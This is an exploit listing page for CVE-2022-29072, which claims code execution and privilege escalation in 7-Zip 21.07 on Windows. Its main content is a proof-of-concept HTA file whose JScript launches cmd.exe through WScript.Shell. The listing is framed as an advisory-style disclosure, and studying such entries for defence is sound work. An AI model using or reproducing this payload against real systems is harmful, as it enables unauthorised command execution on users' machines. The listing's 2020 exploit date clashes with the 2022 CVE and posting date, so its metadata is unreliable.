7-Zip 21.07 Code Execution / Privilege Escalation

2022.04.19

Credit: Kagan Capar

Risk: High

Local: No

Remote: Yes

CVE: CVE-2022-29072

CWE: CWE-264

# Exploit Title: 7-zip - Code Execution / Local Privilege Escalation
# Exploit Author: Kagan Capar
# Date: 2020-04-12
# Vendor homepage: https://www.7-zip.org/
# Software link: https://www.7-zip.org/a/7z2107-x64.msi
# Version: 21.07 and all versions
# Tested On: Windows 10 Pro (x64)
# References: https://github.com/kagancapar/CVE-2022-29072
# About:
7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area.
# Proof of Concept:
<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
<head>
<html>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

7-Zip 21.07 Code Execution / Privilege Escalation

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.